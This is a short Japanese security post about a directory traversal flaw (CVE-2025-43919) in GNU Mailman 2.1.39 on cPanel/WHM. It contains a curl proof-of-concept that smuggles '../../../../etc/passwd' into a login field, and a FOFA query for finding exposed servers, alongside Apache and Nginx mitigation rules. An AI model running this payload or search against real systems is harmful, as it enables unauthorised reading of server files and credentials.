
GNU Mailman 2.1.39(cPanel/WHMにバンドルされている)で新たな脆弱性が発見されました。この脆弱性により、認証されていないリモート攻撃者がディレクトリトラバーサルの欠陥を利用してサーバー上の任意のファイルを読み取ることが可能です。
cPanel/WHM にバンドルされている GNU Mailman 2.1.39 で新たな脆弱性が発見されました。ディレクトリトラバーサルの欠陥により、認証されていないリモート攻撃者がサーバー上の任意のファイルを読み取ることが可能です。
📌 脆弱性概要:
ディレクトリトラバーサル (認証不要)private.py CGI スクリプト/mailman/private/mailman/etc/passwd、.mbox アーカイブ、Mailman 設定 などのファイル漏洩5.8 (Medium)CVE-2025-43919ステータス: 公式パッチ未提供(Mailman 2.1.x は EOL)
🔥 概念実証:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 悪用シナリオ:
/etc/passwd、設定、メールボックスファイル の取得🛡️ 緩和策:
Web サーバーレベルで /mailman/private へのアクセスをブロック:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
または Nginx の場合:
location /mailman/private {
deny all;
return 403;
}
⬆️ Mailman 3.x に移行してください — 2.x は EOL であり、最新の防御機能が不足しています
🔍 FOFA クエリ : app="Mailman"
📚 詳細を学び、責任を持って共有し、インフラを安全に保ちましょう。
🔒 実際の CVE、PoC、セキュリティ強化のヒントをさらにフォロー: 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity